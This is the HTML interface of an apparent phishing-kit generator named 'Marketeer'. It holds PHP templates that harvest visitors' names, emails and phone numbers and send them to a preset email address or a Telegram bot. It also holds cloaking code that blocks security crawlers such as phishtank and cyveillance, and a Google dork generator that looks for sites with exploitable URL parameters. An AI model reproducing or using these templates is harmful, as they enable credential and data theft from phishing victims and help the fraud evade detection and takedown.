<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="TAYAA Med Amine">

    <title>Generator [Marketeer]</title>

    <!-- Bootstrap core CSS -->
<link href="/asset/css/bootstrap.min.css" rel="stylesheet">
<link href="/asset/css/font-awesome.min.css" rel="stylesheet">

    <style>
      .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        user-select: none;
      }

      @media (min-width: 768px) {
        .bd-placeholder-img-lg {
          font-size: 3.5rem;
        }
      }
    </style>

    
    <!-- Custom styles for this template -->
    <link href="/asset/css/dashboard.css" rel="stylesheet">

<style>
    .pb-filemng-template {
	    margin-top: 40px;
	    font-family: 'Sansita', sans-serif;
    }

    .pb-filemng-navbar {
	    margin-bottom: 0;
    }

    .treeview-toggle-btn {
	    margin-left: 15px;
    }

    .pb-filemng-template-btn {
	    background-color: Transparent;
        background-repeat:no-repeat;
        border: none;
        cursor:pointer;
        outline:none;
        color: gray;
        padding: 0px 13px 0px 13px;
    }

    .pb-filemng-active {
	    border-bottom: 2px solid #6d97db;
	    color: #5f6977;
    }

    .pb-filemng-template-btn:hover {
	    color: blue;
    }

    .pb-filemng-body-folders > img:hover {
	    cursor: pointer;
    }

    .btn-align {
	    margin-top: 7px;
    }

    .pb-filemng-template-treeview {
	    border-right: 1px solid gray;
    }

    .pb-filemng-folder {
	    color: orange;
	    padding-bottom: 3px;
    }

    .pb-filemng-paragraphs {
	    margin-top: -20px;
	    text-align: center;
    }

    .img-responsive {
	    margin: 0 auto;
    }

@media screen and (max-width: 767px) {

	.pb-filemng-template-treeview {
		border-right: none;
	}

	#options {
		text-align: center;
	}

	#options > li {
		display: inline-block;
	}

	#pb-filemng-navigation > ul {
		text-align: center;
	}

	#pb-filemng-navigation > ul > li {
		display: inline-block;
	}

}
</style>

    <link href="/asset/css/chosen.css" rel="stylesheet">
<!-- you need to include the shieldui css and js assets in order for the charts to work -->
<link rel="stylesheet" type="text/css" href="/asset/css/shieldui-all.min.css" />

  </head>
  <body>
    
<header class="navbar navbar-dark sticky-top bg-dark flex-md-nowrap p-0 shadow">
  <a class="navbar-brand col-md-3 col-lg-2 me-0 px-3" href="#">Marketeer</a>
  <button class="navbar-toggler position-absolute d-md-none collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#sidebarMenu" aria-controls="sidebarMenu" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
  <input class="form-control form-control-dark w-100" type="text" placeholder="Search" aria-label="Search">
  <ul class="navbar-nav px-3">
    <li class="nav-item text-nowrap">
      <a class="nav-link" href="#">Sign out</a>
    </li>
  </ul>
</header>

<div class="container-fluid">
  <div class="row">
    <nav id="sidebarMenu" class="col-md-3 col-lg-2 d-md-block bg-light sidebar collapse"></nav>
    <main class="col-md-9 ms-sm-auto col-lg-10 px-md-4">
      <div class="album pt-1 pb-1">
        <ul id="generator" class="nav nav-tabs" role="tablist">
            <li class="nav-item" role="presentation">
                <button class="nav-link" id="antibot-tab" data-bs-toggle="tab" data-bs-target="#antibot" type="button" role="tab" aria-controls="antibot" aria-selected="false">
                    Anti-Bot
                </button>
            </li>
            <li class="nav-item" role="presentation">
                <button class="nav-link" id="dorkany-tab" data-bs-toggle="tab" data-bs-target="#dorkany" type="button" role="tab" aria-controls="dorkany" aria-selected="false">
                    Dork Multiply
                </button>
            </li>
            <li class="nav-item" role="presentation">
                <button class="nav-link active" id="payload-tab" data-bs-toggle="tab" data-bs-target="#payload" type="button" role="tab" aria-controls="payload" aria-selected="false">
                    Form Payload
                </button>
            </li>
        </ul>
        <div id="generatorContent" class="tab-content">
            <div id="antibot" class="tab-pane fade" role="tabpanel" aria-labelledby="antibot-tab">
                <div class="row">
                    <div class="col-md-4">
                      <div class="row">
                        <div class="col-6">
                          <label for="anti_user_agent" class="form-label">User-Agent</label>
                          <div class="input-group has-validation">
                            <textarea type="text" class="form-control" id="anti_user_agent" placeholder="User-Agent" rows="7" required>bot
crawler
spider
facebook
alexa
twitter
curl</textarea>
                            <div class="invalid-feedback">
                              User-Agents to be blocked are required.
                            </div>
                          </div>
                        </div>
                        <div class="col-6">
                          <label for="anti_key_words" class="form-label">Keywords</label>
                          <div class="input-group has-validation">
                            <textarea type="text" class="form-control" id="anti_key_words" placeholder="Keywords" rows="7" required>tor-exit
cyveillance
phishtank
amazonaws
calyxinstitute
</textarea>
                            <div class="invalid-feedback">
                              Keywords to be blocked are required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <label for="anti_networks" class="form-label">Network ranges</label>
                          <div class="input-group has-validation">
                            <select class="form-select chzn-select" id="anti_networks" size="12" multiple>

                            </select>
                            <div class="invalid-feedback">
                              Your Telegram API Token is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
            <button type="button" class="mt-3 btn btn-sm btn-primary w-100" id="defending">
                <ii class="fa fa-code">
                generate
            </button>
                        </div>
                      </div>
                    </div>
                    <div class="col-md-8">
                        Custom Processing :
                        <textarea id="php_antibot" class="form-control w-100" rows="22">
        </textarea>
                    </div>
                </div>
            </div>
            <div id="payload" class="tab-pane fade show active" role="tabpanel" aria-labelledby="payload-tab">
                <div class="row">
                    <div class="col-md-4">
                      <div class="row">
                        <div class="col-12">
                          <label for="http_redirect" class="form-label">HTTP redirection</label>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="http_redirect" placeholder="HTTP redirection" required="" value="https://www.google.com/">
                            <div class="invalid-feedback">
                              Your HTTP redirection is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <div class="form-check">
                            <input type="checkbox" class="form-check-input" id="is_file" checked>
                            <label class="form-check-label" for="is_file">Activate File logging</label>
                          </div>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="file_target" placeholder="Logging file name" required="" value="log.txt">
                            <div class="invalid-feedback">
                              Your Logging file name is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <hr class="my-3">
                        </div>
                        <div class="col-12">
                          <div class="form-check">
                            <input type="checkbox" class="form-check-input" id="is_smtp" checked>
                            <label class="form-check-label" for="is_telegram">Activate SMTP</label>
                          </div>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="smtp_target" placeholder="SMTP destination" required="" value="tayamino@gmail.com">
                            <div class="invalid-feedback">
                              Your SMTP destination Token is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <label for="smtp_header" class="form-label">SMTP header</label>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="smtp_header" placeholder="SMTP header" required="" value="Request [$ip]">
                            <div class="invalid-feedback">
                              Your SMTP header is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <label for="smtp_subject" class="form-label">SMTP subject</label>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="smtp_subject" placeholder="SMTP subject" required="" value="Billing from that ip $ip">
                            <div class="invalid-feedback">
                              Your SMTP subject is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <hr class="my-3">
                        </div>
                        <div class="col-12">
                          <div class="form-check">
                            <input type="checkbox" class="form-check-input" id="is_telegram">
                            <label class="form-check-label" for="is_telegram">Activate Telegram</label>
                          </div>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="telegram_token" placeholder="Telegram API token" required="" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
                            <div class="invalid-feedback">
                              Your Telegram API Token is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <label for="telegram_chat_id" class="form-label">Telegram Chat ID</label>
                          <div class="input-group has-validation">
                            <input type="text" class="form-control" id="telegram_chat_id" placeholder="Telegram Chat ID" required="" value="yyyyyyyyy">
                            <div class="invalid-feedback">
                              Your Telegram Chat ID is required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
            <button type="button" class="mt-3 btn btn-sm btn-primary w-100" id="compiling">
                <ii class="fa fa-code">
                generate
            </button>
                        </div>
                      </div>
                    </div>
                    <div class="col-md-8">
                        Input script :
                        <textarea id="php_content" class="form-control w-100" rows="22">
$message  = "Infos for : http://www.geoiptool.com/?IP=".$_SERVER['REMOTE_ADDR']."\n";
$message .= "\n";
$message .= "Full name     : ".$_POST['fname']."\n";
$message .= "Email address : ".$_POST['email']."\n";
$message .= "Telephone     : ".$_POST['phone']."\n";
</textarea>
                    </div>
                </div>
            </div>
            <div id="dorkany" class="tab-pane fade" role="tabpanel" aria-labelledby="dorkany-tab">
                <div class="row">
                    <div class="col-md-4">
                      <div class="row">
                        <div class="col-6">
                          <label for="dork_keyword_1" class="form-label">Keyword 1</label>
                          <div class="input-group has-validation">
                            <textarea type="text" class="form-control" id="dork_keyword_1" placeholder="Keyword 1" rows="7" required>
crawler
spider
facebook
alexa
twitter
curl</textarea>
                            <div class="invalid-feedback">
                              User-Agents to be blocked are required.
                            </div>
                          </div>
                        </div>
                        <div class="col-6">
                          <label for="dork_keyword_2" class="form-label">Keyword 2</label>
                          <div class="input-group has-validation">
                            <textarea type="text" class="form-control" id="dork_keyword_2" placeholder="Keyword 2" rows="7" required>
cyveillance
phishtank
amazonaws
calyxinstitute
</textarea>
                            <div class="invalid-feedback">
                              Keywords to be blocked are required.
                            </div>
                          </div>
                        </div>
                        <div class="col-12">
                          <label for="dork_country" class="form-label">Countries</label>
                          <div class="input-group has-validation">
                            <textarea type="text" class="form-control" id="dork_country" placeholder="Countries" rows="7" required>
france
spain
</textarea>
                            <div class="invalid-feedback">
                              Your Telegram API Token is required.
                            </div>
                          </div>
                          <br />
                        </div>
                        <div class="col-12">
<div class="progress">
    <div id="progress_key1" class="progress-bar" role="progressbar" style="width: 0%" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100"></div>
</div>
<div class="progress">
    <div id="progress_key2" class="progress-bar" role="progressbar" style="width: 0%" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100"></div>
</div>
<div class="progress">
    <div id="progress_flag" class="progress-bar" role="progressbar" style="width: 0%" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100"></div>
</div>
                        </div>
                        <div class="col-12">
                            <button id="finding" type="button" class="mt-3 btn btn-sm btn-primary w-100">
                                <ii class="fa fa-code">
                                generate
                            </button>
                        </div>
                      </div>
                    </div>
                    <div class="col-md-8">
                        Output content :
                        <textarea id="dork_output" class="form-control w-100" rows="22">
</textarea>
                    </div>
                </div>
            </div>
        </div>
      </div>
    </main>
  </div>
</div>
<div class="modal fade" id="modalSourceCode" tabindex="-1" role="dialog" aria-labelledby="labelSourceCode" aria-hidden="true">
    <div class="modal-dialog modal-lg" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title" id="labelSourceCode">Generated script</h5>
            </div>
            <div class="modal-body">
                <div class="row">
                    <div class="col-md-12">
                        <textarea id="php_output" class="form-control" rows="20" readonly></textarea>
                    </div>
                </div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <button type="button" class="btn btn-primary">Save changes</button>
            </div>
        </div>
    </div>
</div>
    <script type="text/html" id="php_smtp">
//$bilhead .= $_POST['eMailAdd']."\n";
$bilhead .= "MIME-Version: 1.0\n";

mail($bilsnd,$bilsub,$message,$bilhead);
</script>
    <script type="text/html" id="php_telegram">
$url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID;
$url = $url . "&text=" . urlencode($message);
$ch = curl_init();
$optArray = array(
    CURLOPT_URL => $url,
    CURLOPT_RETURNTRANSFER => true
);
curl_setopt_array($ch, $optArray);
$result = curl_exec($ch);
curl_close($ch);
</script>
    <script type="text/html" id="tpl_antibot"><?php

if(preg_match('/{{ browsers }}/i', $_SERVER['HTTP_USER_AGENT'])) {
    logger("[BOT] {$_SERVER['REQUEST_URI']} - 500");
    header('HTTP/1.1 500 Internal Server Error');
    exit();
} 

$bannedIP = array({{ networks }});

if(in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
	header("location: {{ failsafe }}");
	exit;
} else {
	foreach($bannedIP as $ip) {
		if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
			header("location: {{ failsafe }}");
			exit;
		}
	}
}

$blocked_words = array({{ keywords }});

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("location: {{ failsafe }}");
        exit;
    }
}
</script>
    <script type="text/html" id="dork_google">
{{ w1 }}.{{ w2 }}?id= site:{{ c }}
{{ w1 }}.{{ w2 }}?cat_ID= site:{{ c }}
{{ w1 }}.{{ w2 }}?id_category= site:{{ c }}
{{ w1 }}.{{ w2 }}?category_id= site:{{ c }}
{{ w1 }}.{{ w2 }}?catID= site:{{ c }}
{{ w1 }}.{{ w2 }}?list= site:{{ c }}
{{ w1 }}.{{ w2 }}?list_id= site:{{ c }}
{{ w1 }}.{{ w2 }}?r= site:{{ c }}
{{ w1 }}.{{ w2 }}?login= site:{{ c }}
{{ w1 }}.{{ w2 }}?member= site:{{ c }}
{{ w1 }}.{{ w2 }}?admin= site:{{ c }}
{{ w1 }}.{{ w2 }}?pay= site:{{ c }}
{{ w1 }}.{{ w2 }}?buy= site:{{ c }}
{{ w1 }}.{{ w2 }}?ID= site:{{ c }}
{{ w1 }}.{{ w2 }}?reffID= site:{{ c }}
{{ w1 }}.{{ w2 }}?job= site:{{ c }}
{{ w1 }}.{{ w2 }}?cID= site:{{ c }}
{{ w1 }}.{{ w2 }}?gameid= site:{{ c }}
{{ w2 }}?CoID= site:{{ c }}
</script>
    <script src="/asset/js/jquery-3.6.0.min.js"></script>
        <script src="/asset/js/bootstrap.bundle.min.js"></script>
        <script src="/asset/js/twig.js"></script>
        <script src="/asset/js/Chart.min.js"></script>
    <script src="/asset/js/jquery.treed.js"></script>
        <script src="/asset/js/d3-collection.v1.min.js"></script>
        <script src="/asset/js/d3-dispatch.v1.min.js"></script>
        <script src="/asset/js/d3-dsv.v1.min.js"></script>
        <script src="/asset/js/d3-request.v1.min.js"></script>
        <script src="/asset/js/d3-queue.v3.min.js"></script>
    <script src="/asset/js/chosen.min.js"></script>
    <script src="/engin/custom.js"></script>
    <script src="/engin/mod/tools/generator.js"></script>
  </body>
</html>

